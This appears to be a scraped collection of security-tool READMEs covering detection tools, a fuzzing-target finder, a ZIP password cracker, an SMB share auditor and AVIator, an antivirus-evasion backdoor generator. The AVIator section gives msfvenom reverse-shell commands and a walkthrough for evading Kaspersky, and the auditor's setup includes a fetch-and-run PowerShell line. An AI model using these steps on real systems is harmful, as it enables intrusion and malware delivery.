The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S port 389 and 636 and RPC port 135 access to the domain controller and clients. In addition it requires domain admin privileges or a user in the Event log Reader group or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as an output a csv comma delimited format file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credential of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be formalized with netbios name and not ip addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attacker’s movement. The lateral movement graph is not always a path in the sub-graph, in some attacks the attacker goes in many different directions.

  • Alert: A sub-graph the algorithm suspects are part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services β€œrpc”, β€œrpcss” and β€œtermsrv.”

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeks’ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.

The lateral movement IoCs are:

Whiteβ€― cane β€―- User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attack’s objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being a admin user)

Weight Shift - White cane (see above) from machine A to machines {B1,…, Bn}, followed by another White cane from machine Bx to machines {C1,…,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attack’s purposes from now on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants \ executes ransomware on a mass number of machines simultaneously

Output:

The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
  2. A GIF file represents the progression, wherby each frame of the GIF specifies exactly what was the suspicious action
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color

Dependencies:

  1. Python 3.8
  2. libraries as follows in requirements.txt
  3. Run pip install . for running setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.

usage

The Collector

Required arguments:

  1. credentials [domain.com/]username[:password] credentials format alternatively [domain.com/]username and then password will be prompted securely. For domain please insert the FQDN (Fully Quallified Domain Name). Optional arguments:
  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from. month-day-year format, if not specified take all available data
  8. -threads amount of working threads to use
  9. -ldap Use Unsecure LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file authentication file should contain list of NTLM and Kerberos requests

Optional arguments: 2. -output_file The location the csv with the all the IOCs is going to be saved to 3. -progression_output_file The location the csv with the the IOCs of the lateral movements is going to be save to 4. -sink_threshold number of accounts from which a machine is considered sink, default is 50 5. -hub_threshold number of accounts from which a machine is considered hub, default is 20 6. -learning_period learning period in days, default is 7 days 7. -show_all_iocs Show IoC that are not connected to any other IoCs 8. -show_gant If true, output the events in a gant format

Binary Usage Open command prompt and navigate to the binary folder. Run executables with the specified above arguments.

Examples

In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python eventlogcollector.py domain.com/username:password -ntlm -kerberos
  2. python analyzer.py logs.csv


AVIator - Antivirus Evasion Project


AviAtor Ported to NETCore 5 with an updated UI


AV|Ator

About://name

AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption in order to encrypt a given shellcode
  • Generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected to the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


Usage

The application has a form which consists of three main inputs (See screenshot bellow):

  1. A text containing the encryption key used to encrypt the shellcode
  2. A text containing the IV used for AES encryption
  3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"

Beware of the fact that some AVs alert the spoof by its own as a malware.

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the allready compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your linux distribution, download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.



Fuzzable - Framework For Automating Fuzzable Target Discovery With Static Analysis


Framework for Automating Fuzzable Target Discovery with Static Analysis.

Introduction

Vulnerability researchers conducting security assessments on software will often harness the capabilities of coverage-guided fuzzing through powerful tools like AFL++ and libFuzzer. This is important as it automates the bughunting process and reveals exploitable conditions in targets quickly. However, when encountering large and complex codebases or closed-source binaries, researchers have to painstakingly dedicate time to manually audit and reverse engineer them to identify functions where fuzzing-based exploration can be useful.

Fuzzable is a framework that integrates both with C/C++ source code and binaries to assist vulnerability researchers in identifying function targets that are viable for fuzzing. This is done by applying several static analysis-based heuristics to pinpoint risky behaviors in the software and the functions that executes them. Researchers can then utilize the framework to generate basic harness templates, which can then be used to hunt for vulnerabilities, or to be integrated as part of a continuous fuzzing pipeline, such as Google's oss-fuzz project.

In addition to running as a standalone tool, Fuzzable is also integrated as a plugin for the Binary Ninja disassembler, with support for other disassembly backends being developed.

Check out the original blog post detailing the tool here, which highlights the technical specifications of the static analysis heuristics and how this tool came about. This tool is also featured at Black Hat Arsenal USA 2022.


Features

  • Supports analyzing binaries (with Angr and Binary Ninja) and source code artifacts (with tree-sitter).
  • Run static analysis both as a standalone CLI tool or a Binary Ninja plugin.
  • Harness generation to ramp up on creating fuzzing campaigns quickly.

Installation

Some binary targets may require some sanitizing (ie. signature matching, or identifying functions from inlining), and therefore fuzzable primarily uses Binary Ninja as a disassembly backend because of it's ability to effectively solve these problems. Therefore, it can be utilized both as a standalone tool and plugin.

Since Binary Ninja isn't accessible to all and there may be a demand to utilize for security assessments and potentially scaling up in the cloud, an angr fallback backend is also supported. I anticipate to incorporate other disassemblers down the road as well (priority: Ghidra).

Command Line (Standalone)

If you have Binary Ninja Commercial, be sure to install the API for standalone headless usage:

$ python3 /Applications/Binary\ Ninja.app/Contents/Resources/scripts/install_api.py

Install with pip:

$ pip install fuzzable

Manual/Development Build

We use poetry for dependency management and building. To do a manual build, clone the repository with the third-party modules:

$ git clone --recursive https://github.com/ex0dus-0x/fuzzable

To install manually:

$ cd fuzzable/

# without poetry
$ pip install .

# with poetry
$ poetry install

# with poetry for a development virtualenv
$ poetry shell

You can now analyze binaries and/or source code with the tool!

# analyzing a single shared object library binary
$ fuzzable analyze examples/binaries/libbasic.so

# analyzing a single C source file
$ fuzzable analyze examples/source/libbasic.c

# analyzing a workspace with multiple C/C++ files and headers
$ fuzzable analyze examples/source/source_bundle/

Binary Ninja Plugin

fuzzable can be easily installed through the Binary Ninja plugin marketplace by going to Binary Ninja > Manage Plugins and searching for it. Here is an example of the fuzzable plugin running, accuracy identifying targets for fuzzing and further vulnerability assessment:

Usage

fuzzable comes with various options to help better tune your analysis. More will be supported in future plans and any feature requests made.

Static Analysis Heuristics

To determine fuzzability, fuzzable utilize several heuristics to determine which targets are the most viable to target for dynamic analysis. These heuristics are all weighted differently using the scikit-criteria library, which utilizes multi-criteria decision analysis to determine the best candidates. These metrics and are there weights can be seen here:

Heuristic Description Weight
Fuzz Friendly Name Symbol name implies behavior that ingests file/buffer input 0.3
Risky Sinks Arguments that flow into risky calls (ie memcpy) 0.3
Natural Loops Number of loops detected with the dominance frontier 0.05
Cyclomatic Complexity Complexity of function target based on edges + nodes 0.05
Coverage Depth Number of callees the target traverses into 0.3

As mentioned, check out the technical blog post for a more in-depth look into why and how these metrics are utilized.

Many metrics were largely inspired by Vincenzo Iozzo's original work in 0-knowledge fuzzing.

Every targets you want to analyze is diverse, and fuzzable will not be able to account for every edge case behavior in the program target. Thus, it may be important during analysis to tune these weights appropriately to see if different results make more sense for your use case. To tune these weights in the CLI, simply specify the --score-weights argument:

$ fuzzable analyze <TARGET> --score-weights=0.2,0.2,0.2,0.2,0.2

Analysis Filtering

By default, fuzzable will filter out function targets based on the following criteria:

  • Top-level entry calls - functions that aren't called by any other calls in the target. These are ideal entry points that have potentially very high coverage.
  • Static calls - (source only) functions that are static and aren't exposed through headers.
  • Imports - (binary only) other library dependencies being used by the target's implementations.

To see calls that got filtered out by fuzzable, set the --list_ignored flag:

$ fuzzable analyze --list-ignored <TARGET>

In Binary Ninja, you can turn this setting in Settings > Fuzzable > List Ignored Calls.

In the case that fuzzable falsely filters out important calls that should be analyzed, it is recommended to use --include-* arguments to include them during the run:

# include ALL non top-level calls that were filtered out
$ fuzzable analyze --include-nontop <TARGET>

# include specific symbols that were filtered out
$ fuzzable analyze --include-sym <SYM> <TARGET>

In Binary Ninja, this is supported through Settings > Fuzzable > Include non-top level calls and Symbols to Exclude.

Harness Generation

Now that you have found your ideal candidates to fuzz, fuzzable will also help you generate fuzzing harnesses that are (almost) ready to instrument and compile for use with either a file-based fuzzer (ie. AFL++, Honggfuzz) or in-memory fuzzer (libFuzzer). To do so in the CLI:

If this target is a source codebase, the generic source template will be used.

If the target is a binary, the generic black-box template will be used, which ideally can be used with a fuzzing emulation mode like AFL-QEMU. A copy of the binary will also be created as a shared object if the symbol isn't exported directly to be dlopened using LIEF.

At the moment, this feature is quite rudimentary, as it simply will create a standalone C++ harness populated with the appropriate parameters, and will not auto-generate code that is needed for any runtime behaviors (ie. instantiating and freeing structures). However, the templates created for fuzzable should get still get you running quickly. Here are some ambitious features I would like to implement down the road:

  • Full harness synthesis - harnesses will work directly with absolutely no manual changes needed.
  • Synthesis from potential unit tests using the DeepState framework (Source only).
  • Immediate deployment to a managed continuous fuzzing fleet.

Exporting Reports

fuzzable supports generating reports in various formats. The current ones that are supported are JSON, CSV and Markdown. This can be useful if you are utilizing this as part of automation where you would like to ingest the output in a serializable format.

In the CLI, simply pass the --export argument with a filename with the appropriate extension:

$ fuzzable analyze --export=report.json <TARGET>

In Binary Ninja, go to Plugins > Fuzzable > Export Fuzzability Report > ... and select the format you want to export to and the path you want to write it to.

Contributing

This tool will be continuously developed, and any help from external mantainers are appreciated!

  • Create an issue for feature requests or bugs that you have come across.
  • Submit a pull request for fixes and enhancements that you would like to see contributed to this tool.

License

Fuzzable is licensed under the MIT License.



tcpdump 4.99.3

tcpdump allows you to dump the traffic on a network. It can be used to print out the headers and/or contents of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect many attacks, or to monitor the network activities.

Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based Encryption Algorithm symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed to the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bits integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher ciphertext entirely as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of nl-6 where n is the size of the character set and l is the length of the password.

bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

  • Recover internal state from ciphertext and plaintext.
  • Change a ZIP archive's password using the internal state.
  • Recover the original password from the internal state.

Install

Precompiled packages

You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

Compile from source

Alternatively, you can compile the project with CMake.

First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install

Thrid-party packages

bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

Usage

List entries

You can see a list of entry names and metadata in an archive named archive.zip like this:

bkcrack -L archive.zip

Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

Recover internal keys

The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

Load data from zip archives

Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

Load data from files

Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

bkcrack -c cipherfile -p plainfile

Offset

If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

bkcrack -c cipherfile -p plainfile -o offset

Sparse plaintext

If you know little contiguous plaintext (between 8 and 11 bytes), but know some bytes at some other known offsets, you can provide this information to reach the requirement of a total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

Number of threads

If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

Decipher

If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

bkcrack -c cipherfile -p plainfile -d decipheredfile

If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

Decompress

The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

python3 tools/inflate.py < decipheredfile > decompressedfile

Unlock encrypted archive

It is also possible to generate a new encrypted archive with the password of your choice:

bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

Recover password

Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

You can be more specific by specifying a minimal password length:

bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

Learn

A tutorial is provided in the example folder.

For more information, have a look at the documentation and read the source.

Contribute

Do not hesitate to suggest improvements or submit pull requests on GitHub.

License

This project is provided under the terms of the zlib/png license.



KRIe - Linux Kernel Runtime Integrity With eBPF


KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.

KRIe has been developed using CO-RE (Compile Once - Run Everywhere) so that it is compatible with a large range of kernel versions. If your kernel doesn't export its BTF debug information, KRIe will try to download it automatically from BTFHub. If your kernel isn't available on BTFHub, but you have been able to manually generate your kernel's BTF data, you can provide it in the configuration file (see below).


System requirements

This project was developed on Ubuntu Focal 20.04 (Linux Kernel 5.15) and has been tested on older releases down to Ubuntu Bionic 18.04 (Linux Kernel 4.15).

  • golang 1.18+
  • (optional) Kernel headers are expected to be installed in lib/modules/$(uname -r), update the Makefile with their location otherwise.
  • (optional) clang & llvm 14.0.6+

Optional fields are required to recompile the eBPF programs.

Build

  1. Since KRIe was built using CORE, you shouldn't need to rebuild the eBPF programs. That said, if you want still want to rebuild the eBPF programs, you can use the following command:
# ~ make build-ebpf
  1. To build KRIE, run:
# ~ make build
  1. To install KRIE (copy to /usr/bin/krie) run:
# ~ make install

Getting started

KRIe needs to run as root. Run sudo krie -h to get help.

# ~ krie -h
Usage:
krie [flags]

Flags:
--config string KRIe config file (default "./cmd/krie/run/config/default_config.yaml")
-h, --help help for krie

Configuration

## Log level, options are: panic, fatal, error, warn, info, debug or trace
log_level: debug

## JSON output file, leave empty to disable JSON output.
output: "/tmp/krie.json"

## BTF information for the current kernel in .tar.xz format (required only if KRIE isn't able to locate it by itself)
vmlinux: ""

## events configuration
events:
## action taken when an init_module event is detected
init_module: log

## action taken when an delete_module event is detected
delete_module: log

## action taken when a bpf event is detected
bpf: log

## action taken when a bpf_filter event is detected
bpf_filter: log

## action taken when a ptrace event is detected
ptrace: log

## action taken when a kprobe event is detected
kprobe: log

## action taken when a sysctl event is detected
sysctl:
action: log

## Default settings for sysctl programs (kernel 5.2+ only)
sysctl_default:
block_read_access: false
block_write_access: false

## Custom settings for sysctl programs (kernel 5.2+ only)
sysctl_parameters:
kernel/yama/ptrace_scope:
block_write_access: true
kernel/ftrace_enabled:
override_input_value_with: "1\n"

## action taken when a hooked_syscall_table event is detected
hooked_syscall_table: log

## action taken when a hooked_syscall event is detected
hooked_syscall: log

## kernel_parameter event configuration
kernel_parameter:
action: log
periodic_action: log
ticker: 1 # sends at most one event every [ticker] second(s)
list:
- symbol: system/kprobes_all_disarmed
expected_value: 0
size: 4
# - symbol: system/selinux_state
# expecte d_value: 256
# size: 2

# sysctl
- symbol: system/ftrace_dump_on_oops
expected_value: 0
size: 4
- symbol: system/kptr_restrict
expected_value: 0
size: 4
- symbol: system/randomize_va_space
expected_value: 2
size: 4
- symbol: system/stack_tracer_enabled
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_clone
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_apparmor_policy
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_bpf_disabled
expected_value: 1
size: 4
- symbol: system/ptrace_scope
expected_value: 2
size: 4
- symbol: system/sysctl_perf_event_paranoid
expected_value: 2
size: 4
- symbol: system/kexe c_load_disabled
expected_value: 1
size: 4
- symbol: system/dmesg_restrict
expected_value: 1
size: 4
- symbol: system/modules_disabled
expected_value: 0
size: 4
- symbol: system/ftrace_enabled
expected_value: 1
size: 4
- symbol: system/ftrace_disabled
expected_value: 0
size: 4
- symbol: system/sysctl_protected_fifos
expected_value: 1
size: 4
- symbol: system/sysctl_protected_hardlinks
expected_value: 1
size: 4
- symbol: system/sysctl_protected_regular
expected_value: 2
size: 4
- symbol: system/sysctl_protected_symlinks
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_userfaultfd
expected_value: 0
size: 4

## action to check when a regis ter_check fails on a sensitive kernel space hook point
register_check: log

Documentation

License

  • The golang code is under Apache 2.0 License.
  • The eBPF programs are under the GPL v2 License.


I2P 2.1.0

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

PowerHuntShares - Audit Script Designed In Inventory, Analyze, And Report Excessive Privileges Configured On Active Directory Domains


PowerHuntShares is design to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers.
It is intented to help IAM and other blue teams gain a better understand of their SMB Share attack surface and provides data insights to help naturally group related share to help stream line remediation efforts at scale.


It supports functionality to:

  • Authenticate using the current user context, a credential, or clear text user/password.
  • Discover accessible systems associated with an Active Directory domain automatically. It will also filter Active Directory computers based on available open ports.
  • Target a single computer, list of computers, or discovered Active Directory computers (default).
  • Collect SMB share ACL information from target computers using PowerShell.
  • Analyze collected Share ACL data.
  • Report summary reports and excessive privilege details in HTML and CSV file formats.

Excessive SMB share ACLs are a systemic problem and an attack surface that all organizations struggle with. The goal of this project is to provide a proof concept that will work towards building a better share collection and data insight engine that can help inform and priorititize remediation efforts.

Bonus Features:

  • Generate directory listing dump for configurable depth
  • Search for file types across discovered shares

I've also put together a short presentation outlining some of the common misconfigurations and strategies for prioritizing remediation here: https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721

Vocabulary

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges
Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. All provide domain users access to the affected shares due to privilege inheritance issues. Note there is a parameter that allow operators to add their own target groups.
Below is some additional background:

  • Everyone is a direct reference that applies to both unauthenticated and authenticated users. Typically only a null session is required to access those resources.
  • BUILTIN\Users contains Authenticated Users
  • Authenticated Users contains Domain Users on domain joined systems. That's why Domain Users can access a share when the share permissions have been assigned to "BUILTIN\Users".
  • Domain Users is a direct reference
  • Domain Users can also create up to 10 computer accounts by default that get placed in the Domain Computers group
  • Domain Users that have local administrative access to a domain joined computer can also impersonate the computer account.

Please Note: Share permissions can be overruled by NTFS permissions. Also, be aware that testing excluded share names containing the following keywords:

print$, prnproc$, printer, netlogon,and sysvol

High Risk Shares
In the context of this report, high risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes the shares

 wwwroot, inetpub, c$, and admin$   
However, additional exposures may exist that are not called out beyond that.

Setup Commands

Below is a list of commands that can be used to load PowerHuntShares into your current PowerShell session. Please note that one of these will have to be run each time you run PowerShell is run. It is not persistent.

# Bypass execution policy restrictions
Set-ExecutionPolicy -Scope Process Bypass

# Import module that exists in the current directory
Import-Module .\PowerHuntShares.psm1

or

# Reduce SSL operating level to support connection to github
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12

# Download and load PowerHuntShares.psm1 into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

Example Commands

Important Note: All commands should be run as an unprivileged domain user.

.EXAMPLE 1: Run from a domain computer. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

.EXAMPLE 2: Run from a domain computer with alternative domain credentials. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user

.EXAMPLE 3: Run from a domain computer as current user. Target hosts in a file. One per line.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -HostList c:\temp\hosts.txt

.EXAMPLE 4: Run from a non-domain computer with credential. Performs Active Directory computer discovery by default.
C:\temp\test> runas /netonly /user:domain\user PowerShell.exe
PS C:\temp\test> Import-Module Invoke-HuntSMBShares.ps1
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -Run SpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user

===============================================================
PowerHuntShares
===============================================================
This function automates the following tasks:

o Determine current computer's domain
o Enumerate domain computers
o Filter for computers that respond to ping reqeusts
o Filter for computers that have TCP 445 open and accessible
o Enumerate SMB shares
o Enumerate SMB share permissions
o Identify shares with potentially excessive privielges
o Identify shares that provide reads & write access
o Identify shares thare are high risk
o Identify common share owners, names, & directory listings
o Generate creation, last written, & last accessed timelines
o Generate html summary report and detailed csv files

Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
---------------------------------------------------------------
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems..
[*][03/01/2021 09:37] Scan Complete
---------------------------------------------------------------
SHARE ANALYSIS
---------------------------------------------------------------
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
---------------------------------------------------------------
SHARE REPORT SUMMARY
---------------------------------------------------------------
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] R un time: 00:02:23.2759086
